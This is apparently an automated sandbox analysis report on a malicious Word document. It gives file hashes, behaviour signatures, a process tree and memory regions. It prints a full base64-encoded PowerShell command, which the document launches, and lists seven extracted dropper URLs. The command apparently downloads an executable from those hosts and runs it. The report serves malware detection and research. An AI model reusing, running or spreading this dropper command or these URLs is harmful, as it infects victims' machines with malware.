Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 20:58

General

  • Target

    ee69332cee99615667e1e2977001c8e9_JaffaCakes118.doc

  • Size

    143KB

  • MD5

    ee69332cee99615667e1e2977001c8e9

  • SHA1

    c6c38aef2cd89dd57b8984d34d96eaa18c9ff987

  • SHA256

    faf7ed24aa5991a653301120b138611b6ab03b4b6241d93739d871c81cda1540

  • SHA512

    4b012c0b890bac5aaf142dce86f2ce7bc0ff36d8b8cf73079bee3904ad3d8a9e38dc3d75eb9d87f351e3c44e286910ce3f4f743ba145ae81102a4bb27c747f5f

  • SSDEEP

    1536:IBpHfa3BkRD3bNqfNpu39IId5a6XP3Mg8afmq4MxXOYgnJnIJe4SGOMKaK4/j:0R1qf69xak3MgxmrY0nae4sMKT6j

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ibccglobal.com/thankyou2/ARA/

exe.dropper

http://work.digitalvichar.com/1mv7clu/o/

exe.dropper

http://13.229.25.57/7xdfb/jpA/

exe.dropper

http://binarystationary.com/cgi-bin/5rM/

exe.dropper

http://fmcav.com/images/ZQF/

exe.dropper

https://kodiakheating.com/ldnha/ybI/

exe.dropper

https://khvs.vrfantasy.gallery/igiodbck/eXq/

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee69332cee99615667e1e2977001c8e9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1436
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABTAGMAaAA0AHoAagAyAD0AKAAnAFoAXwAnACsAKAAnAHoAcgAnACsAJwBqADMAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATwBmAGkAbABlAFwASQBjADQARQBHAFYAdQBcAEMAXwB6AFMAawA1AFgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAVQBgAFIAYABJAFQAeQBgAHAAUgBvAFQATwBDAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwArACcAMgAsACAAdAAnACkAKwAoACcAbAAnACsAJwBzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABJAHgAOAB4AHAAbgBxACAAPQAgACgAJwBCAHAAJwArACcANgAnACsAKAAnAHAANAB4ACcAKwAnAHAAawAnACkAKQA7ACQAUAA4AHAAcAB5AGYAdAA9ACgAKAAnAFIAOAAnACsAJwBuAGcAJwApACsAJwB5ACcAKwAnADYAZAAnACkAOwAkAFcAZgBvAF8AbwBkAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASQAnACsAJwBjADQAZQBnAHYAdQB7ADAAfQAnACsAJwBDAF8AegBzAGsANQB4AHsAJwArACcAMAB9ACcAKQAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAHgAOAB4AHAAbgBxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABCAGYAaAA3AGQAdQBtAD0AKAAoACcARAAnACsAJwBxADcAJwApACsAKAAnADAAaAAnACsAJwBwAGMAJwApACkAOwAkAFUAcgB5AGIAMABkAGkAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AVwBFAEIAQwBMAGkAZQBuAHQAOwAkAFcAZQBwAGIAZABmAG8APQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAoACcALwBpACcAKwAnAGIAJwApACsAKAAnAGMAYwBnAGwAbwBiACcAKwAnAGEAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHQAaABhAG4AawB5AG8AJwArACcAdQAyAC8AQQBSACcAKQArACcAQQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvACcAKQArACgAJwB3AG8AJwArACcAcgAnACkAKwAoACcAawAuAGQAJwArACcAaQBnACcAKQArACgAJwBpAHQAJwArACcAYQAnACsAJwBsAHYAaQBjAGgAYQByACcAKQArACgAJwAuAGMAJwArACcAbwBtAC8AMQBtAHYAJwApACsAKAAnADcAYwBsAHUAJwArACcALwAnACkAKwAoACcAbwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwAnACsAJwAxADMAJwArACcALgAyACcAKwAnADIAJwApACsAKAAnADkAJwArACcALgAyACcAKwAnADUALgA1ADcALwA3AHgAZABmAGIALwBqACcAKwAnAHAAQQAvACcAKwAnACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAOgAvACcAKwAnAC8AYgBpACcAKwAnAG4AYQByAHkAcwB0AGEAdABpAG8AJwApACsAJwBuACcAKwAnAGEAJwArACcAcgB5ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAtACcAKwAnAGIAaQBuAC8ANQAnACkAKwAoACcAcgAnACsAJwBNAC8AKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AC8AJwArACcALwBmACcAKQArACgAJwBtAGMAJwArACcAYQAnACkAKwAoACcAdgAuAGMAbwAnACsAJwBtAC8AaQBtAGEAZwAnACsAJwBlAHMAJwArACcALwAnACsAJwBaAFEAJwArACcARgAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBrAG8AZABpAGEAawBoAGUAJwArACcAYQAnACkAKwAoACcAdABpACcAKwAnAG4AZwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGwAJwArACcAZABuACcAKQArACgAJwBoAGEAJwArACcALwAnACkAKwAoACcAeQBiACcAKwAnAEkALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAAnACsAJwBzADoALwAvACcAKwAnAGsAaAB2ACcAKQArACgAJwBzAC4AdgByAGYAYQBuACcAKwAnAHQAYQBzAHkAJwArACcALgAnACsAJwBnAGEAbAAnACkAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAvAGkAJwArACcAZwBpACcAKQArACgAJwBvAGQAJwArACcAYgBjAGsAJwApACsAKAAnAC8AZQBYAHEAJwArACcALwAnACkAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGgAZABuAG0AbQBsAD0AKAAoACcARQByAHUAJwArACcANgB4ACcAKQArACcAbgAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAcwAwAGgAcwB2ADIAIABpAG4AIAAkAFcAZQBwAGIAZABmAG8AKQB7AHQAcgB5AHsAJABVAHIAeQBiADAAZABpAC4AIgBEAG8AYABXAGAATgBsAE8AYQBEAGAARgBpAGwARQAiACgAJABYAHMAMABoAHMAdgAyACwAIAAkAFcAZgBvAF8AbwBkAGYAKQA7ACQAVQBlADIAcwBoAG8AcwA9ACgAKAAnAE8AcQBqACcAKwAnAGkAJwApACsAKAAnAGsAJwArACcAdQAzACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFcAZgBvAF8AbwBkAGYAKQAuACIATABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANQA1ADcAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABXAGYAbwBfAG8AZABmACkAOwAkAFMAagBxADIAMgBfADEAPQAoACcASgAxACcAKwAoACcAdwBfAHMAJwArACcAbQAzACcAKQApADsAYgByAGUAYQBrADsAJABJAGgAZAB5AHYAcQB0AD0AKAAoACcAQgA0ACcAKwAnADgAJwApACsAKAAnAGMAJwArACcAZAB1AHgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAYQA5AGUAMAA0AGIAPQAoACcAQQB5ACcAKwAoACcANgB6ACcAKwAnADgAJwApACsAJwBiAGMAJwApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      fb2fafc186debad6a5a27913afeefbdb

      SHA1

      db1fdffa570c5d705945d7b26079ff557ca10857

      SHA256

      a415af4f688d5246543fee1a2f538c5dec6d9616aeae6e9b2ec7ee177b60f5b4

      SHA512

      d424cce97aa7d15105f5609b6ae6333647057793a4b9e50607265c8a0d8cfd610648cc3f8ab5eaac3da13ba61f7836ef6a7fa18a38ce62ed82793b0b4d508488

    • memory/2340-36-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-40-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-5-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-6-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-7-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-20-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-28-0x0000000005E90000-0x0000000005F90000-memory.dmp

      Filesize

      1024KB

    • memory/2340-24-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-17-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-15-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-16-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-14-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-11-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-0-0x000000002F5F1000-0x000000002F5F2000-memory.dmp

      Filesize

      4KB

    • memory/2340-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-29-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-2-0x0000000070BCD000-0x0000000070BD8000-memory.dmp

      Filesize

      44KB

    • memory/2340-37-0x0000000005E90000-0x0000000005F90000-memory.dmp

      Filesize

      1024KB

    • memory/2340-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-39-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-41-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-38-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-45-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-47-0x0000000005E90000-0x0000000005F90000-memory.dmp

      Filesize

      1024KB

    • memory/2340-46-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-32-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-30-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-82-0x0000000070BCD000-0x0000000070BD8000-memory.dmp

      Filesize

      44KB

    • memory/2340-81-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2340-55-0x0000000070BCD000-0x0000000070BD8000-memory.dmp

      Filesize

      44KB

    • memory/2340-56-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-57-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-58-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-59-0x0000000005E90000-0x0000000005F90000-memory.dmp

      Filesize

      1024KB

    • memory/2340-60-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2340-62-0x0000000005E90000-0x0000000005F90000-memory.dmp

      Filesize

      1024KB

    • memory/2340-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2916-54-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/2916-53-0x000000001B720000-0x000000001BA02000-memory.dmp

      Filesize

      2.9MB